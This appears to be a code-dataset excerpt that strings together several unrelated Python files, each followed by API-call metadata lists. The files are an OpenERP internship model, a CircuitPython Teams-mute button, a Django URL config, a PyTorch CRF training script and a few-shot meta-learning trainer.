cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((8084, 8122), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (8103, 8122), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((11929, 11967), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (11948, 11967), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((14397, 14435), 'cohesity_management_sdk.exceptions.error_error_exception.ErrorErrorException', 'ErrorErrorException', (['"""Error"""', '_context'], {}), "('Error', _context)\n", (14416, 14435), False, 'from cohesity_management_sdk.exceptions.error_error_exception import ErrorErrorException\n'), ((5412, 5442), 'cohesity_management_sdk.api_helper.APIHelper.json_serialize', 'APIHelper.json_serialize', (['body'], {}), '(body)\n', (5436, 5442), False, 'from cohesity_management_sdk.api_helper import APIHelper\n'), ((14006, 14036), 'cohesity_management_sdk.api_helper.APIHelper.json_serialize', 'APIHelper.json_serialize', (['body'], {}), '(body)\n', (14030, 14036), False, 'from cohesity_management_sdk.api_helper import APIHelper\n')] |
# -*- coding: utf-8 -*-
from openerp.osv import osv
from openerp.osv import fields
import time
class stage_tache(osv.osv):
""" stage_tache """
_name = 'stage.tache'
_description = 'stage_tache'
_columns = {
'type': fields.char('Type', size=100, required=True),
}
stage_tache()
class stage_type(osv.osv):
""" stage_type """
_name = 'stage.type'
_description = 'stage_type'
_columns = {
'type': fields.char('Type', size=100, required=True),
}
stage_type()
class stage_statut(osv.osv):
""" stage_statut """
_name = 'stage.statut'
_description = 'stage_statut'
_columns = {
'type': fields.char('Status', size=100, required=True),
}
stage_statut()
class stage_stage(osv.osv):
""" stage_stage"""
_name = 'stage.stage'
_description = 'stage_stage'
_columns = {
'sujet': fields.char('sujet', size=100, required=True),
'date_debut': fields.date('Date Début', required=True),
'date_fin': fields.date('Date Fin', required=True),
}
stage_stage()
| [
"openerp.osv.fields.char",
"openerp.osv.fields.date"
] | [((239, 283), 'openerp.osv.fields.char', 'fields.char', (['"""Type"""'], {'size': '(100)', 'required': '(True)'}), "('Type', size=100, required=True)\n", (250, 283), False, 'from openerp.osv import fields\n'), ((444, 488), 'openerp.osv.fields.char', 'fields.char', (['"""Type"""'], {'size': '(100)', 'required': '(True)'}), "('Type', size=100, required=True)\n", (455, 488), False, 'from openerp.osv import fields\n'), ((656, 702), 'openerp.osv.fields.char', 'fields.char', (['"""Status"""'], {'size': '(100)', 'required': '(True)'}), "('Status', size=100, required=True)\n", (667, 702), False, 'from openerp.osv import fields\n'), ((868, 913), 'openerp.osv.fields.char', 'fields.char', (['"""sujet"""'], {'size': '(100)', 'required': '(True)'}), "('sujet', size=100, required=True)\n", (879, 913), False, 'from openerp.osv import fields\n'), ((930, 970), 'openerp.osv.fields.date', 'fields.date', (['"""Date Début"""'], {'required': '(True)'}), "('Date Début', required=True)\n", (941, 970), False, 'from openerp.osv import fields\n'), ((985, 1023), 'openerp.osv.fields.date', 'fields.date', (['"""Date Fin"""'], {'required': '(True)'}), "('Date Fin', required=True)\n", (996, 1023), False, 'from openerp.osv import fields\n')] |
"""Button which sends one key combination."""
import time
import board
from digitalio import DigitalInOut, Direction, Pull
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
import usb_hid
# Define output LED
led = DigitalInOut(board.LED)
led.direction = Direction.OUTPUT
# Configure as keyboard
kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(kbd)
# Define button
button = DigitalInOut(board.D10)
button.direction = Direction.INPUT
button.pull = Pull.UP
is_led_on = False
is_button_ready = True
while True:
if is_button_ready and button.value is False: # Button pressed
is_button_ready = False
if not is_led_on:
print("Mute Microsoft Teams ...")
kbd.send(Keycode.CONTROL, Keycode.SHIFT, Keycode.M)
is_led_on = True
led.value = True
else:
print("Unmute Microsoft Teams ...")
kbd.send(Keycode.CONTROL, Keycode.SHIFT, Keycode.M)
is_led_on = False
led.value = False
if button.value is True: # Button released
is_button_ready = True
time.sleep(0.05)
| [
"digitalio.DigitalInOut",
"adafruit_hid.keyboard.Keyboard",
"time.sleep",
"adafruit_hid.keyboard_layout_us.KeyboardLayoutUS"
] | [((311, 334), 'digitalio.DigitalInOut', 'DigitalInOut', (['board.LED'], {}), '(board.LED)\n', (323, 334), False, 'from digitalio import DigitalInOut, Direction, Pull\n'), ((399, 424), 'adafruit_hid.keyboard.Keyboard', 'Keyboard', (['usb_hid.devices'], {}), '(usb_hid.devices)\n', (407, 424), False, 'from adafruit_hid.keyboard import Keyboard\n'), ((434, 455), 'adafruit_hid.keyboard_layout_us.KeyboardLayoutUS', 'KeyboardLayoutUS', (['kbd'], {}), '(kbd)\n', (450, 455), False, 'from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS\n'), ((482, 505), 'digitalio.DigitalInOut', 'DigitalInOut', (['board.D10'], {}), '(board.D10)\n', (494, 505), False, 'from digitalio import DigitalInOut, Direction, Pull\n'), ((1181, 1197), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (1191, 1197), False, 'import time\n')] |
from django.conf.urls import url
from .views import ResaleListView, detailed
urlpatterns = [
url(r'^$', ResaleListView.as_view(), name='index'),
url(r'^(?P<pk>\d+)/$', detailed, name='detailed'),
]
| [
"django.conf.urls.url"
] | [((156, 205), 'django.conf.urls.url', 'url', (['"""^(?P<pk>\\\\d+)/$"""', 'detailed'], {'name': '"""detailed"""'}), "('^(?P<pk>\\\\d+)/$', detailed, name='detailed')\n", (159, 205), False, 'from django.conf.urls import url\n')] |
import os
import math
import gzip
import csv
import time
import torch
import torch.optim as optim
import torch.utils.data as data_utils
from sklearn.model_selection import train_test_split
from tqdm import tqdm
# import matplotlib.pyplot as plt
import numpy as np
from crf import CRF
# import Data Loader
from data_loader import get_dataset
if __name__ == '__main__':
# hyperparameters, dimensions and model parameters
dim = 128
epochs = 1
labels = 26
max_iter = 500
embed_dim = 128
batch_size = 64
conv_shapes = [[1, 64, 128]]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# model and optimizer
model = CRF(dim, embed_dim, conv_shapes, labels, batch_size).to(device)
opt = optim.LBFGS(model.parameters(), lr=0.01)
dataset = get_dataset()
print(dataset.target.shape, dataset.data.shape)
# X_train, X_test, y_train, y_test = train_test_split(dataset.data, dataset.target, test_size=0.3, stratify=dataset.target)
split = int(0.7 * len(dataset.data))
X_train, X_test = dataset.data[:split], dataset.data[split:]
y_train, y_test = dataset.target[:split], dataset.target[split:]
# train_data = train_data.to(device)
# test_data = test_data.to(device)
# train_target = train_target.to(device)
# test_target = test_target.to(device)
train = data_utils.TensorDataset(torch.tensor(X_train).float(), torch.tensor(y_train).float())
test = data_utils.TensorDataset(torch.tensor(X_test).float(), torch.tensor(y_test).float())
# train = train.to(device)
# test = test.to(device)
# print(len(train[0][1][0]))
train_letter, test_letter, train_word, test_word = [], [], [], []
# Clear all log files
dir_name = "Q4"
files = os.listdir(dir_name)
for file in files:
if file.endswith(".txt"):
with open(os.path.join(dir_name, file), "r+") as f:
f.truncate(0)
f.close()
for i in range(epochs):
step = 1
print("\nEpoch {}".format(i + 1))
start_epoch = time.time()
train_data = data_utils.DataLoader(train, batch_size=batch_size, shuffle=True, sampler=None, num_workers=5,
pin_memory=True)
test_data = data_utils.DataLoader(test, batch_size=batch_size, shuffle=True, sampler=None, num_workers=5,
pin_memory=True)
train_mean_word_accuracy, test_mean_word_accuracy, train_mean_letter_accuracy, test_mean_letter_accuracy = 0, 0, 0, 0
for batch, sample in tqdm(enumerate(train_data)):
print("\nEpoch-{} Mini-Batch-{}".format(i + 1, batch))
start_t = time.time()
train_X = sample[0].to(device)
train_Y = sample[1].to(device)
def compute_loss():
opt.zero_grad()
_loss = model.loss(train_X, train_Y)
_loss.backward()
return _loss
start_step = time.time()
opt.step(compute_loss)
print("Epoch-{} Batch-{} Step-{} TIME ELAPSED = {}".format(i + 1, batch, step, time.time() - start_step))
for name, values in model.named_parameters():
if values.requires_grad:
print("Parameters", name, values.data)
random_index = np.random.choice(X_test.shape[0], batch_size, replace=False)
test_X = X_test[random_index, :]
test_Y = y_test[random_index, :]
test_X = torch.from_numpy(test_X).float().to(device)
test_Y = torch.from_numpy(test_Y).long().to(device)
total_train_words = len(train_Y)
total_test_words = len(test_Y)
total_train_letters = torch.sum(train_Y).item()
total_test_letters = torch.sum(test_Y).item()
print("Getting Accuracy")
with torch.no_grad():
print("Training predictions-->")
train_predictions = model(train_X)
print("Test predictions-->")
test_predictions = model(test_X)
word_acc_train = 0
letter_acc_train = 0
for y, y_preds in zip(train_Y, train_predictions):
letters = int(torch.sum(y).item())
if torch.all(torch.eq(y[:letters], y_preds[:letters])):
word_acc_train = word_acc_train + 1
letter_acc_train = letter_acc_train + letters - (
((~torch.eq(y[:letters], y_preds[:letters])).sum()) / 2).item()
word_accuracy_test = 0
letter_accuracy_test = 0
for y, y_preds in zip(test_Y, test_predictions):
letters = int(torch.sum(y).item())
if torch.all(torch.eq(y[:letters], y_preds[:letters])):
word_accuracy_test = word_accuracy_test + 1
letter_accuracy_test = letter_accuracy_test + letters - (
((~torch.eq(y[:letters], y_preds[:letters])).sum()) / 2).item()
letter_acc_train /= total_train_letters
letter_accuracy_test /= total_test_letters
word_acc_train /= total_train_words
word_accuracy_test /= total_test_words
## collect accuracies for 100 steps
train_letter.append(letter_acc_train)
test_letter.append(letter_accuracy_test)
train_word.append(word_acc_train)
test_word.append(word_accuracy_test)
f_trainingepoc = open("Q4/wordwise_training.txt", "a")
f_trainingepoc.write(str(word_acc_train) + "\n")
f_trainingepoc.close()
f_trainingepoc = open("Q4/letterwise_training.txt", "a")
f_trainingepoc.write(str(letter_acc_train) + "\n")
f_trainingepoc.close()
f_wtestingepoc = open("Q4/wordwise_testing.txt", "a")
f_wtestingepoc.write(str(word_accuracy_test) + "\n")
f_wtestingepoc.close()
f_testingepoc = open("Q4/letterwise_testing.txt", "a")
f_testingepoc.write(str(letter_accuracy_test) + "\n")
f_testingepoc.close()
print("\nTraining Accuracy ")
print("\tWord Acc = ", train_word)
print("\tLetter Acc = ", train_letter)
print(" Test Accuracy : ")
print("\tWord accuracy = ", test_word)
print("\tLetter accuracy = ", test_letter)
train_mean_word_accuracy = sum(train_word) / len(train_word)
test_mean_word_accuracy = sum(test_word) / len(test_word)
train_mean_letter_accuracy = sum(train_letter) / len(train_letter)
test_mean_letter_accuracy = sum(test_letter) / len(test_letter)
print(
"\n Train mean word accuracy = {}\n Test mean word accuracy = {}\n Train mean letter accuracy = {}\n Test mean letter accuracy = {}\n".format(
train_mean_word_accuracy, test_mean_word_accuracy, train_mean_letter_accuracy,
test_mean_letter_accuracy))
print("Epoch-{} Batch-{} Step-{} TIME TAKEN = {}".format(i, batch, step, time.time() - start_t))
step += 1
if step > max_iter: break
print("Epoch completed Epoch-{} Batch-{} Step-{} TIME ELAPSED = {}".format(i + 1, batch, step - 1,
time.time() - start_epoch)) | [
"os.listdir",
"numpy.random.choice",
"os.path.join",
"torch.from_numpy",
"torch.eq",
"torch.tensor",
"torch.cuda.is_available",
"data_loader.get_dataset",
"torch.sum",
"torch.utils.data.DataLoader",
"torch.no_grad",
"crf.CRF",
"time.time"
] | [((841, 854), 'data_loader.get_dataset', 'get_dataset', ([], {}), '()\n', (852, 854), False, 'from data_loader import get_dataset\n'), ((1818, 1838), 'os.listdir', 'os.listdir', (['dir_name'], {}), '(dir_name)\n', (1828, 1838), False, 'import os\n'), ((2138, 2149), 'time.time', 'time.time', ([], {}), '()\n', (2147, 2149), False, 'import time\n'), ((2174, 2290), 'torch.utils.data.DataLoader', 'data_utils.DataLoader', (['train'], {'batch_size': 'batch_size', 'shuffle': '(True)', 'sampler': 'None', 'num_workers': '(5)', 'pin_memory': '(True)'}), '(train, batch_size=batch_size, shuffle=True, sampler=\n None, num_workers=5, pin_memory=True)\n', (2195, 2290), True, 'import torch.utils.data as data_utils\n'), ((2351, 2466), 'torch.utils.data.DataLoader', 'data_utils.DataLoader', (['test'], {'batch_size': 'batch_size', 'shuffle': '(True)', 'sampler': 'None', 'num_workers': '(5)', 'pin_memory': '(True)'}), '(test, batch_size=batch_size, shuffle=True, sampler=\n None, num_workers=5, pin_memory=True)\n', (2372, 2466), True, 'import torch.utils.data as data_utils\n'), ((628, 653), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (651, 653), False, 'import torch\n'), ((708, 760), 'crf.CRF', 'CRF', (['dim', 'embed_dim', 'conv_shapes', 'labels', 'batch_size'], {}), '(dim, embed_dim, conv_shapes, labels, batch_size)\n', (711, 760), False, 'from crf import CRF\n'), ((2784, 2795), 'time.time', 'time.time', ([], {}), '()\n', (2793, 2795), False, 'import time\n'), ((3102, 3113), 'time.time', 'time.time', ([], {}), '()\n', (3111, 3113), False, 'import time\n'), ((3460, 3520), 'numpy.random.choice', 'np.random.choice', (['X_test.shape[0]', 'batch_size'], {'replace': '(False)'}), '(X_test.shape[0], batch_size, replace=False)\n', (3476, 3520), True, 'import numpy as np\n'), ((1429, 1450), 'torch.tensor', 'torch.tensor', (['X_train'], {}), '(X_train)\n', (1441, 1450), False, 'import torch\n'), ((1460, 1481), 'torch.tensor', 'torch.tensor', (['y_train'], {}), '(y_train)\n', (1472, 1481), False, 'import torch\n'), ((1528, 1548), 'torch.tensor', 'torch.tensor', (['X_test'], {}), '(X_test)\n', (1540, 1548), False, 'import torch\n'), ((1558, 1578), 'torch.tensor', 'torch.tensor', (['y_test'], {}), '(y_test)\n', (1570, 1578), False, 'import torch\n'), ((4015, 4030), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4028, 4030), False, 'import torch\n'), ((1923, 1951), 'os.path.join', 'os.path.join', (['dir_name', 'file'], {}), '(dir_name, file)\n', (1935, 1951), False, 'import os\n'), ((3871, 3889), 'torch.sum', 'torch.sum', (['train_Y'], {}), '(train_Y)\n', (3880, 3889), False, 'import torch\n'), ((3931, 3948), 'torch.sum', 'torch.sum', (['test_Y'], {}), '(test_Y)\n', (3940, 3948), False, 'import torch\n'), ((4446, 4486), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (4454, 4486), False, 'import torch\n'), ((4928, 4968), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (4936, 4968), False, 'import torch\n'), ((7646, 7657), 'time.time', 'time.time', ([], {}), '()\n', (7655, 7657), False, 'import time\n'), ((3242, 3253), 'time.time', 'time.time', ([], {}), '()\n', (3251, 3253), False, 'import time\n'), ((7364, 7375), 'time.time', 'time.time', ([], {}), '()\n', (7373, 7375), False, 'import time\n'), ((3635, 3659), 'torch.from_numpy', 'torch.from_numpy', (['test_X'], {}), '(test_X)\n', (3651, 3659), False, 'import torch\n'), ((3701, 3725), 'torch.from_numpy', 'torch.from_numpy', (['test_Y'], {}), '(test_Y)\n', (3717, 3725), False, 'import torch\n'), ((4395, 4407), 'torch.sum', 'torch.sum', (['y'], {}), '(y)\n', (4404, 4407), False, 'import torch\n'), ((4877, 4889), 'torch.sum', 'torch.sum', (['y'], {}), '(y)\n', (4886, 4889), False, 'import torch\n'), ((4645, 4685), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (4653, 4685), False, 'import torch\n'), ((5143, 5183), 'torch.eq', 'torch.eq', (['y[:letters]', 'y_preds[:letters]'], {}), '(y[:letters], y_preds[:letters])\n', (5151, 5183), False, 'import torch\n')] |
import torch
import numpy as np
import argparse
import os
from utils import Logger, LogFiles, ValidationAccuracies, cross_entropy_loss, compute_accuracy, MetaLearningState,\
shuffle
from model import FewShotClassifier
from dataset import get_dataset_reader
from tf_dataset_reader import TfDatasetReader
from image_folder_reader import ImageFolderReader
NUM_VALIDATION_TASKS = 200
NUM_TEST_TASKS = 600
PRINT_FREQUENCY = 1000
def main():
learner = Learner()
learner.run()
class Learner:
def __init__(self):
self.args = self.parse_command_line()
self.log_files = LogFiles(self.args.checkpoint_dir, self.args.resume_from_checkpoint,
(self.args.mode == 'test') or (self.args.mode == 'test_vtab'))
self.logger = Logger(self.args.checkpoint_dir, "log.txt")
self.logger.print_and_log("Options: %s\n" % self.args)
self.logger.print_and_log("Checkpoint Directory: %s\n" % self.log_files.checkpoint_dir)
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
self.model = self.init_model()
self.train_set, self.validation_set, self.test_set = self.init_data()
if self.args.mode == "train" or self.args.mode == "test" or self.args.mode == 'train_test':
self.dataset = get_dataset_reader(
args=self.args,
train_set=self.train_set,
validation_set=self.validation_set,
test_set=self.test_set)
if self.args.train_method == 'lite':
self.train_fn = self.train_lite
else:
self.train_fn = self.train_task
self.use_batches = False if self.args.train_method == 'no_lite' else True
self.loss = cross_entropy_loss
self.accuracy_fn = compute_accuracy
self.optimizer = torch.optim.Adam(self.model.parameters(), lr=self.args.learning_rate)
self.validation_accuracies = ValidationAccuracies(self.validation_set)
self.start_iteration = 0
if self.args.resume_from_checkpoint:
self.load_checkpoint()
self.optimizer.zero_grad()
self.feature_cache = None
def init_model(self):
model = FewShotClassifier(args=self.args, logger=self.logger, device=self.device).to(self.device)
model.count_parameters(model)
# set encoder is always in train mode (it only sees context data).
# Feature extractor gets switched in model.
model.train()
return model
def init_data(self):
train_set = ['ilsvrc_2012', 'omniglot', 'aircraft', 'cu_birds', 'dtd', 'quickdraw', 'fungi', 'mnist']
validation_set = ['omniglot', 'aircraft', 'cu_birds', 'dtd', 'quickdraw', 'fungi', 'mscoco']
test_set = self.args.test_datasets
return train_set, validation_set, test_set
"""
Command line parser
"""
def parse_command_line(self):
parser = argparse.ArgumentParser()
# operational parameters
parser.add_argument("--mode", choices=["train", "test", "train_test", "test_vtab"], default="train_test",
help="Whether to run meta-training only, meta-testing only,"
"both meta-training and meta-testing, or testing on vtab.")
parser.add_argument("--checkpoint_dir", "-c", default='../checkpoints', help="Directory to save checkpoint to.")
parser.add_argument("--resume_from_checkpoint", "-r", dest="resume_from_checkpoint", default=False,
action="store_true", help="Restart from latest checkpoint.")
# data parameters
parser.add_argument('--test_datasets', nargs='+', help='Datasets to use for testing',
default=["omniglot", "aircraft", "cu_birds", "dtd", "quickdraw", "fungi", "traffic_sign",
"mscoco"])
parser.add_argument("--data_path", default="../datasets", help="Path to Meta-Dataset records.")
parser.add_argument("--download_path_for_tensorflow_datasets", default=None,
help="Path to download the tensorflow datasets.")
parser.add_argument("--download_path_for_sun397_dataset", default=None,
help="Path to download the sun397 dataset.")
# training parameters
parser.add_argument("--train_method", choices=["lite", "small_task", "no_lite"], default="lite",
help="Whether to use lite, small tasks, or not lite.")
parser.add_argument("--pretrained_model_path", default="../models/efficientnet-b0_84.pt",
help="Path to dataset records.")
parser.add_argument("--learning_rate", "-lr", type=float, default=0.001, help="Learning rate.")
parser.add_argument("--tasks_per_step", type=int, default=16,
help="Number of tasks between parameter optimizations.")
parser.add_argument("--training_iterations", "-i", type=int, default=10000,
help="Number of meta-training iterations.")
parser.add_argument("--max_way_train", type=int, default=50, help="Maximum way of meta-train task.")
parser.add_argument("--max_support_train", type=int, default=500,
help="Maximum support set size of meta-train task.")
parser.add_argument("--image_size", type=int, default=224, help="Image height and width.")
parser.add_argument("--batch_size", type=int, default=40, help="Size of batch.")
parser.add_argument("--h", type=int, default=40,
help="Number of support set samples to back-propagate when training with LITE.")
# testing parameters
parser.add_argument("--test_model_path", "-m", default=None, help="Path to model to load and test.")
parser.add_argument("--val_freq", type=int, default=5000, help="Number of iterations between validations.")
args = parser.parse_args()
return args
def run(self):
if self.args.mode == 'train' or self.args.mode == 'train_test':
train_accuracies = []
losses = []
total_iterations = self.args.training_iterations
for iteration in range(self.start_iteration, total_iterations):
task_dict = self.dataset.get_train_task()
context_images, target_images, context_labels, target_labels = self.prepare_task(task_dict)
if self.use_batches:
self.model.clear_caches()
self.feature_cache = None
target_set_size = len(target_labels)
num_batches = self._get_number_of_batches(target_set_size)
for batch in range(num_batches):
batch_start_index, batch_end_index = self._get_batch_indices(batch, target_set_size)
batch_loss, batch_accuracy = self.train_fn(
context_images,
target_images[batch_start_index : batch_end_index],
context_labels,
target_labels[batch_start_index : batch_end_index]
)
train_accuracies.append(batch_accuracy)
losses.append(batch_loss)
else:
task_loss, task_accuracy = self.train_fn(context_images, target_images, context_labels,
target_labels)
train_accuracies.append(task_accuracy)
losses.append(task_loss)
# optimize
if ((iteration + 1) % self.args.tasks_per_step == 0) or (iteration == (total_iterations - 1)):
self.optimizer.step()
self.optimizer.zero_grad()
if (iteration + 1) % PRINT_FREQUENCY == 0:
# print training stats
self.save_checkpoint(iteration + 1)
torch.save(self.model.state_dict(), os.path.join(self.log_files.checkpoint_dir,
"model_{}.pt".format(iteration + 1)))
self.logger.print_and_log('Task [{}/{}], Train Loss: {:.7f},'
'Train Accuracy: {:.7f}, Learning Rate: {:.7f}'
.format(iteration + 1, total_iterations,
torch.Tensor(losses).mean().item(),
torch.Tensor(train_accuracies).mean().item(),
self.optimizer.param_groups[0]['lr']))
train_accuracies = []
losses = []
if ((iteration + 1) % self.args.val_freq == 0) and (iteration + 1) != total_iterations:
# validate
accuracy_dict = self.validate()
self.validation_accuracies.print(self.logger, accuracy_dict)
# save the model if validation is the best so far
if self.validation_accuracies.is_better(accuracy_dict):
self.validation_accuracies.replace(accuracy_dict)
torch.save(self.model.state_dict(), self.log_files.best_validation_model_path)
self.logger.print_and_log('Best validation model was updated.')
self.logger.print_and_log('')
# save the final model
torch.save(self.model.state_dict(), self.log_files.fully_trained_model_path)
if self.args.mode == 'train_test':
self.test(self.log_files.fully_trained_model_path)
self.test(self.log_files.best_validation_model_path)
if self.args.mode == 'test':
self.test(self.args.test_model_path)
if self.args.mode == 'test_vtab':
self._test_transfer_learning(self.args.test_model_path)
def train_task(self, context_images, target_images, context_labels, target_labels):
target_logits = self.model(context_images, context_labels, target_images, MetaLearningState.META_TRAIN)
task_loss = self.loss(target_logits, target_labels) / self.args.tasks_per_step
regularization_term = (self.model.feature_adaptation_network.regularization_term())
regularizer_scaling = 0.001
task_loss += regularizer_scaling * regularization_term
task_accuracy = self.accuracy_fn(target_logits, target_labels)
task_loss.backward(retain_graph=False)
return task_loss, task_accuracy
def train_lite(self, context_images, target_images, context_labels, target_labels):
# We'll split the context set into two: the first part will be of size batch_size and we'll use gradients
# for that. The second part will be everything else and we'll use no gradients for that, so we only need to
# compute that once per task.
context_size = context_images.size(0)
indices = np.random.permutation(context_size)
h = min(self.args.h, context_size) # number of example to back propagate
grad_indices = indices[0: h]
no_grad_indices = indices[h:]
self.model.build_task_representation_with_split_batch(context_images, grad_indices, no_grad_indices)
context_features = self._compute_features_with_split_batch(context_images, grad_indices, no_grad_indices,
MetaLearningState.META_TRAIN)
self.model.configure_classifier(context_features, context_labels[indices])
# now the target set
torch.set_grad_enabled(True)
batch_logits = self.model.predict(target_images, MetaLearningState.META_TRAIN)
# compute the loss
batch_loss = self.loss(batch_logits, target_labels) / self.args.tasks_per_step
regularization_term = (self.model.feature_adaptation_network.regularization_term())
regularizer_scaling = 0.001
batch_loss += regularizer_scaling * regularization_term
# compute accuracy
batch_accuracy = self.accuracy_fn(batch_logits, target_labels)
batch_loss.backward(retain_graph=False)
return batch_loss, batch_accuracy
def _get_number_of_batches(self, task_size):
num_batches = int(np.ceil(float(task_size) / float(self.args.batch_size)))
if num_batches > 1 and (task_size % self.args.batch_size == 1):
num_batches -= 1
return num_batches
def _get_batch_indices(self, index, last_element):
batch_start_index = index * self.args.batch_size
batch_end_index = batch_start_index + self.args.batch_size
if batch_end_index == (last_element - 1): # avoid batch size of 1
batch_end_index = last_element
if batch_end_index > last_element:
batch_end_index = last_element
return batch_start_index, batch_end_index
def validate(self):
with torch.no_grad():
accuracy_dict ={}
for item in self.validation_set:
accuracies = []
for _ in range(NUM_VALIDATION_TASKS):
task_dict = self.dataset.get_validation_task(item)
context_images, target_images, context_labels, target_labels = self.prepare_task(task_dict)
if self.use_batches:
self.model.build_task_representation_by_batch(context_images)
context_features = self._compute_features_by_batch(context_images, MetaLearningState.META_TEST)
self.model.configure_classifier(context_features, context_labels)
test_set_size = len(target_labels)
num_batches = self._get_number_of_batches(test_set_size)
target_logits = []
for batch in range(num_batches):
batch_start_index, batch_end_index = self._get_batch_indices(batch, test_set_size)
batch_logits = self.model.predict(target_images[batch_start_index: batch_end_index],
MetaLearningState.META_TEST)
target_logits.append(batch_logits)
target_logits = torch.vstack(target_logits)
target_accuracy = self.accuracy_fn(target_logits, target_labels)
del target_logits
accuracies.append(target_accuracy.item())
else:
target_logits = self.model(context_images, context_labels, target_images, MetaLearningState.META_TEST)
accuracy = self.accuracy_fn(target_logits, target_labels)
accuracies.append(accuracy.item())
del target_logits
accuracy = np.array(accuracies).mean() * 100.0
confidence = (196.0 * np.array(accuracies).std()) / np.sqrt(len(accuracies))
accuracy_dict[item] = {"accuracy": accuracy, "confidence": confidence}
return accuracy_dict
def test(self, path):
self.logger.print_and_log("") # add a blank line
self.logger.print_and_log('Testing model {0:}: '.format(path))
self.model = self.init_model()
if path != 'None':
self.model.load_state_dict(torch.load(path))
with torch.no_grad():
for item in self.test_set:
accuracies = []
for _ in range(NUM_TEST_TASKS):
task_dict = self.dataset.get_test_task(item)
context_images, target_images, context_labels, target_labels = self.prepare_task(task_dict)
if self.use_batches:
self.model.build_task_representation_by_batch(context_images)
context_features = self._compute_features_by_batch(context_images, MetaLearningState.META_TEST)
self.model.configure_classifier(context_features, context_labels)
test_set_size = len(target_labels)
num_batches = self._get_number_of_batches(test_set_size)
target_logits = []
for batch in range(num_batches):
batch_start_index, batch_end_index = self._get_batch_indices(batch, test_set_size)
batch_logits = self.model.predict(target_images[batch_start_index: batch_end_index],
MetaLearningState.META_TEST)
target_logits.append(batch_logits)
target_logits = torch.vstack(target_logits)
target_accuracy = self.accuracy_fn(target_logits, target_labels)
del target_logits
accuracies.append(target_accuracy.item())
else:
target_logits = self.model(context_images, context_labels, target_images,
MetaLearningState.META_TEST)
accuracy = self.accuracy_fn(target_logits, target_labels)
accuracies.append(accuracy.item())
del target_logits
accuracy = np.array(accuracies).mean() * 100.0
accuracy_confidence = (196.0 * np.array(accuracies).std()) / np.sqrt(len(accuracies))
self.logger.print_and_log('{0:}: {1:3.1f}+/-{2:2.1f}'.format(item, accuracy, accuracy_confidence))
def _test_transfer_learning(self, path):
self.logger.print_and_log("") # add a blank line
self.logger.print_and_log('Testing model {0:}: '.format(path))
self.model = self.init_model()
if path != 'None':
self.model.load_state_dict(torch.load(path))
context_set_size = 1000
datasets = [
{'name': "caltech101", 'task': None, 'enabled': True},
{'name': "cifar100", 'task': None, 'enabled': True},
{'name': "oxford_flowers102", 'task': None, 'enabled': True},
{'name': "oxford_iiit_pet", 'task': None, 'enabled': True},
{'name': "sun397", 'task': None, 'enabled': True},
{'name': "svhn_cropped", 'task': None, 'enabled': True},
{'name': "eurosat", 'task': None, 'enabled': True},
{'name': "resisc45", 'task': None, 'enabled': True},
{'name': "patch_camelyon", 'task': None, 'enabled': True},
{'name': "diabetic_retinopathy_detection", 'task': None, 'enabled': True},
{'name': "clevr", 'task': "count", 'enabled': True},
{'name': "clevr", 'task': "distance", 'enabled': True},
{'name': "dsprites", 'task': "location", 'enabled': True},
{'name': "dsprites", 'task': "orientation", 'enabled': True},
{'name': "smallnorb", 'task': "azimuth", 'enabled': True},
{'name': "smallnorb", 'task': "elevation", 'enabled': True},
{'name': "dmlab", 'task': None, 'enabled': True},
{'name': "kitti", 'task': None, 'enabled': True},
]
with torch.no_grad():
for dataset in datasets:
if dataset['enabled'] is False:
continue
if dataset['name'] == "sun397": # use the image folder reader as the tf reader is broken for sun397
dataset_reader = ImageFolderReader(
path_to_images=self.args.download_path_for_sun397_dataset,
context_batch_size=context_set_size,
target_batch_size=self.args.batch_size,
image_size=self.args.image_size,
device=self.device)
else: # use the tensorflow dataset reader
dataset_reader = TfDatasetReader(
dataset=dataset['name'],
task=dataset['task'],
context_batch_size=context_set_size,
target_batch_size=self.args.batch_size,
path_to_datasets=self.args.download_path_for_tensorflow_datasets,
image_size=self.args.image_size,
device=self.device
)
context_images, context_labels = dataset_reader.get_context_batch()
self.model.build_task_representation_by_batch(context_images)
context_features = self._compute_features_by_batch(context_images, MetaLearningState.META_TEST)
self.model.configure_classifier(context_features, context_labels)
test_set_size = dataset_reader.get_target_dataset_length()
num_batches = self._get_number_of_batches(test_set_size)
target_logits = []
target_labels = []
for batch in range(num_batches):
batch_target_images, batch_target_labels = dataset_reader.get_target_batch()
batch_logits = self.model.predict(batch_target_images, MetaLearningState.META_TEST)
target_logits.append(batch_logits)
target_labels.append(batch_target_labels)
target_logits = torch.vstack(target_logits)
target_labels = torch.hstack(target_labels)
target_accuracy = self.accuracy_fn(target_logits, target_labels)
del target_logits
accuracy = target_accuracy * 100.0
if dataset['task'] is None:
self.logger.print_and_log('{0:}: {1:3.1f}'.format(dataset['name'], accuracy))
else:
self.logger.print_and_log('{0:} {1:}: {2:3.1f}'.format(dataset['name'], dataset['task'], accuracy))
def _compute_features_by_batch(self, images, meta_learning_state):
features = []
num_images = images.size(0)
num_batches = self._get_number_of_batches(num_images)
for batch in range(num_batches):
batch_start_index, batch_end_index = self._get_batch_indices(batch, num_images)
features.append(self.model.get_context_features(images[batch_start_index: batch_end_index],
meta_learning_state))
return torch.vstack(features)
